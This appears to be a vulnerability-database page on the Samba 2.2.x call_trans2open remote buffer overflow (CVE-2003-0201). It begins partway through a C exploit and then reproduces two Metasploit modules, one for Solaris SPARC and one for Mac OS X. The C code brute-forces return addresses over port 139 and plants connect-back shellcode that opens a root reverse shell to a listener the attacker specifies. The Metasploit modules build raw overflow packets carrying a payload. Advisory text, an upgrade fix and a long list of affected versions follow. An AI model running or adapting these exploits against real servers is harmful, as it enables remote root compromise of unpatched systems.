      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}

void GoAway() 
{
   exit(0);
}

void start_listen()
{
FILE *fstat;
int cpid;
   
LISTENER:

  bzero(&serv_addr, sizeof(serv_addr));
  serv_addr.sin_family=2;
  serv_addr.sin_addr.s_addr=0;
  serv_addr.sin_port=htons(port_listen); 
  sock_listen=socket(2,1,6);

  if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) 
  {   
      port_listen++;
      goto LISTENER;       
  }
   
  if(listen(sock_listen,1)) 
  {
      perror("listen");
      exit(1);
  }
   
  fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
   
  cpid = fork();
 
  if (cpid) {
     client=accept(sock_listen,0,0);
     LOOP = 0;
     kill(SIGUSR2, exploit_pid);
     if (client > 0) {
        fprintf(stdout, "[+] Yeah, I have a root ....!\n"
                      "------------------------------\n");
        fstat=fopen(".ROOT", "a");  //needed by mass.c
        fclose(fstat);
        shell(client);
     }
     exit(0);
  }
}

int
main (int argc,char *argv[])
{
   char *shellcode = NULL;
   int typeos	= -1;
   int port		= 139;
   int sock		= 0;
   int i		= 0;
   int status	= 0;
   int m		= 0;
   int ip1		= 0;
   int ip2		= 0;
   int ip3		= 0;
   int ip4		= 0;
   int sta		= 0;
   int STEPS	= 512;
   int ENDLOOP    = 64;
   char *desc; 
   unsigned long MAX_CHILDS  = 40;
   unsigned long ret         = 0x0;
   unsigned short int  a_port;
   struct sockaddr_in addr1;
   struct hostent *he;
   struct stat st;
   
      if (argc != 4) usage(argv[0]);
   
      typeos = atoi(argv[1]);
      if (typeos > 3) {
          fprintf(stdout, "Os type out of list!\n");
          exit(1);
      }

      he = gethostbyname(argv[2]);

      if (he == NULL) {
          fprintf(stderr, "Unable to resolve\n");
          return -1;
      }

      listen_pid = getpid();
      start_listen();
      exploit_pid = listen_pid + 1;

      //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);

      sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);		
      linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
      linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
      linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
      linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
				
      fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", 
					ip1, ip2, ip3, ip4, port_listen);

      a_port = htons(port_listen);
      
      linux_connect_back[177]= (a_port) & 0xff;
      linux_connect_back[178]= (a_port >> 8) & 0xff;
      bsd_connect_back[168]= (a_port) & 0xff;
      bsd_connect_back[169]= (a_port >> 8) & 0xff;

      switch(typeos) {
      case 0:
              desc = "Linux";
              ret = 0xc0000000;
              shellcode = linux_connect_back;
              break;
      case 1:
              desc = "FreeBSD/NetBSD";
              ret = 0xbfc00000;
              shellcode = bsd_connect_back;
              break;
      case 2:
              desc = "OpenBSD 3.1 and prior";
              ret = 0xdfc00000;
              shellcode = bsd_connect_back;
              break;
      case 3:
              desc = "OpenBSD 3.2 non-exec stack";
              ret = 0x00170000;
              shellcode = bsd_connect_back;
              break;
      }

      fprintf(stdout, "[+] Target: %s\n", desc);
      memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

      addr1.sin_family = AF_INET;
      addr1.sin_port	 = htons(port);	

      fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
      fprintf(stdout, "[+] Please wait in seconds...!\n");

      signal(SIGUSR2, GoAway);
   
      for (i = 0; i < 50; i++) childs[i] = -1;
      i = 0; m = 0;

      while (LOOP) {

           if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
              fprintf(stderr, "[+] socket() error.\n");
              exit(-1);
           }

           ret -= STEPS; i++;
           if ((ret & 0xff) == 0x00 && typeos != 3) ret++;             

           m++; 
           //fflush(0);
           //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);

           usleep(150000);

           switch (childs[i] = fork()) {
           case 0:  
                  if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 
                      //fprintf(stderr, "[+] connect() error.\n");
                      close(sock);
                      exit(-1);
                  }
			
                 start_session(sock);
                 sleep(3);
		     		         
                 if (typeos != 3) {
                           if (exploit_normal(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                 } else {
                           if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                  }
                  sleep(5);
                  close(sock);
                  exit(0);
                  break;
           case -1:
                  exit(-1);
                  break;
           default:
                  if (i > MAX_CHILDS - 2) {
                      wait(&status);
                      i--;
                  }
                  break;
           } 

           if (m == ENDLOOP) LOOP = 0;
      } 	   

      if (stat(".ROOT", &st) != -1) 
         kill(SIGUSR2, listen_pid);
      else {	
           fprintf(stdout, "[+] Dohh, exploit failed.\n");
	   close(client); close(sock_listen);
           kill(listen_pid, SIGUSR2);
	   sleep(2);
	   exit(0);
      }
}
		

- 漏洞信息 (22471)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4) (EDBID:22471)
unix remote
2003-04-07 Verified
0 noir
N/A [点击下载]
source: http://www.securityfocus.com/bid/7294/info
   
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
   
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
   
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

http://www.exploit-db.com/sploits/22471.tar.gz		

- 漏洞信息 (F84542)

Samba trans2open Overflow (Solaris SPARC) (PacketStormID:F84542)
2009-12-31 00:00:00
H D Moore  metasploit.com
exploit,overflow
solaris
CVE-2003-0201
[点击下载]

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.

##
# $Id: trans2open.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on Solaris SPARC systems that do not
				have the noexec stack option set. Big thanks to MC and
				valsmith for resolving a problem with the beta version of
				this module.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'solaris',
			'Targets'        => 
				[
					["Samba 2.2.x Solaris 9 (sun4u)",  
						{
							'Arch' => ARCH_SPARC, 
							'Rets' => [0xffbffaf0, 0xffbfa000, 128, 0xffbffffc],
						},
					],
					["Samba 2.2.x Solaris 7/8 (sun4u)",
						{
							'Arch' => ARCH_SPARC, 
							'Rets' => [0xffbefaf0, 0xffbea000, 128, 0xffbefffc],
						}
					],
				],
			'DisclosureDate' => 'Apr 7 2003'
			))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
					
	end

	def exploit
	
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
							
				#
				# The obstacle course:
				# 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
				# 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
				# 	return(outsize);
				#

				# This value *must* be 1988 to allow findrecv shellcode to work
				pattern = rand_text_english(1988)

				#
				# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
				#
				# Patch the overwritten heap pointers
				# substr($pattern, 1159, 4, pack('N', $target->[4]));
				# substr($pattern, 1163, 4, pack('N', $target->[4]));
				#
				# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
				# substr($pattern, 1195, 4, pack('N', 0xffffffff));
				#
				# Fix the frame pointer (need to check for null in address)
				# substr($pattern, 1243, 4, pack('N', $target->[3]-64));
				#
				# Finally set the return address
				# substr($pattern, 1247, 4, pack('N', $curr_ret));
				#

				#
				# This method is more reliable against a wider range of targets
				#

				# Local variable pointer patches for early versions of 2.2.x
				pattern[1103, 36] = [target['Rets'][3] - 1024].pack('N') * 9

				# Overwrite heap pointers with a ptr to NULL at the top of the stack
				pattern[1139, 40] = [target['Rets'][3] - 1024].pack('N') * 10

				# Patch the type index into the smb_messages[] array...
				# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
				pattern[1179, 20] = [0xffffffff].pack('N') * 5

				# This stream covers the framepointer and the return address
				pattern[1199, 400] = [curr_ret].pack('N') * 100

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
				  "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				  "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				  pattern

				sock.put(trans)
				handler
				
			rescue EOFError
			rescue => e
				break
			end
			
			curr_ret -= target['Rets'][2]
		end
	end

end
    

- 漏洞信息 (F84541)

Samba trans2open Overflow (Mac OS X) (PacketStormID:F84541)
2009-12-31 00:00:00
H D Moore  metasploit.com
exploit,overflow
apple,osx
CVE-2003-0201
[点击下载]

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.

##
# $Id: trans2open.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Mac OS X)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,

				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        => 
				[
					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],

				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def exploit
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
	
				# 1988 is required for findrecv shellcode
				pattern = rand_text_english(1988)
	
				# This stream covers the framepointer and the return address
				pattern[1195, 64] = [curr_ret].pack('N') * 16

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
					"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
					"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
					pattern

				sock.put(trans)
				handler
				disconnect
				
			rescue EOFError
			rescue => e
				print_status("Caught exception: #{e}")
				break
			end
			curr_ret -= target['Rets'][2]
		end
	end
end
    

- 漏洞信息 (F82311)

Samba trans2open Overflow (PacketStormID:F82311)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,overflow
apple,osx
CVE-2003-0201
[点击下载]

This Metasploit module exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Samba trans2open Overflow (Mac OS X)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,

				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        => 
				[
					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],

				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(139)
				], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def exploit
		curr_ret = target['Rets'][0]
		while (curr_ret >= target['Rets'][1])
			break if session_created?
			begin
				print_status("Trying return address 0x%.8x..." %  curr_ret)

				connect
				smb_login
	
				# 1988 is required for findrecv shellcode
				pattern = rand_text_english(1988)
	
				# This stream covers the framepointer and the return address
				pattern[1195, 64] = [curr_ret].pack('N') * 16

				# Stuff the shellcode into the request
				pattern[3, payload.encoded.length] = payload.encoded

				trans =
					"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
					"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
					"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
					pattern

				sock.put(trans)
				handler
				disconnect
				
			rescue EOFError
			rescue => e
				print_status("Caught exception: #{e}")
				break
			end
			curr_ret -= target['Rets'][2]
		end
	end
end

    

- 漏洞信息

4469
Samba trans2.c call_trans2open() Function Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial

- 漏洞描述

Samba contains a flaw that may allow a remote attacke to execute arbitrary code. The issue is due to a flaw in trans2.c in which the call_trans2open() function user input is not properly sanitized. If an attacker supplied an overly long string to the pname variable, they may be able to overflow the buffer and execute arbitrary code with the privileges of the server.

- 时间线

2003-04-07 2003-04-03
2003-04-08 Unknow

- 解决方案

Upgrade to Samba version 2.2.8a, Samba-TNG 0.3.2, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Samba 'call_trans2open' Remote Buffer Overflow Vulnerability
Boundary Condition Error 7294
Yes No
2003-04-07 12:00:00 2009-07-11 09:06:00
The discoverer of this vulnerability is currently unknown. Digital Defense reported the exploitation of this issue.

- 受影响的程序版本

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 9_x86 Update 2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Linux 5.0
+ Sun LX50
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ 550 4100R
Sun Cobalt Qube3 4000WG
Samba-TNG Samba-TNG 0.3.1
Samba-TNG Samba-TNG 0.3
Samba Samba 2.2.8
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.8
+ FreeBSD FreeBSD 4.8
+ FreeBSD FreeBSD 4.7
+ FreeBSD FreeBSD 4.7
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.6
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.2
Samba Samba 2.2.7 a
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 9.0 i386
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
+ Slackware Linux 8.1
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
Samba Samba 2.2.7
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Sun Linux 5.0.6
+ Sun Solaris 9_x86
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun Solaris 9
Samba Samba 2.2.6
+ Mandriva Linux Mandrake 9.0
Samba Samba 2.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.2
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc3
+ HP CIFS/9000 Server A.01.09.02
+ HP CIFS/9000 Server A.01.09.01
+ HP CIFS/9000 Server A.01.09.01
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.07
+ HP CIFS/9000 Server A.01.07
+ HP CIFS/9000 Server A.01.06
+ HP CIFS/9000 Server A.01.06
+ HP CIFS/9000 Server A.01.05
+ HP CIFS/9000 Server A.01.05
+ OpenPKG OpenPKG 1.1
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
Samba Samba 2.2.4
+ Slackware Linux 8.1
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.08
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ OpenPKG OpenPKG 1.0
+ OpenPKG OpenPKG 1.0
Samba Samba 2.2.1 a
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3
+ Sun Linux 5.0
+ Sun LX50
Samba Samba 2.2 .0a
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
+ Slackware Linux 8.0
+ Slackware Linux 8.0
Samba Samba 2.2 .0
- S.u.S.E. Linux 7.2
Samba Samba 2.0.10
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1
+ Veritas Software ServPoint NAS 3.5
+ Veritas Software ServPoint NAS 1.2.2
+ Veritas Software ServPoint NAS 1.2.2
+ Veritas Software ServPoint NAS 1.2.1
+ Veritas Software ServPoint NAS 1.2.1
+ Veritas Software ServPoint NAS 1.2
+ Veritas Software ServPoint NAS 1.2
+ Veritas Software ServPoint NAS 1.1
+ Veritas Software ServPoint NAS 1.1
+ Wirex Immunix OS 7+
+ Wirex Immunix OS 7+
Samba Samba 2.0.9
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.4
- Apple Mac OS X Server 10.0
- Apple Mac OS X Server 10.0
- Caldera OpenLinux Server 3.1
- Caldera OpenLinux Workstation 3.1
- Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
- Debian Linux 2.2
- Debian Linux 2.2
- Red Hat Linux 6.2
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.1
- RedHat Linux 7.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.3
- Sun Solaris 8_x86
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 7.0
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.1
- Trustix Secure Linux 1.1
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
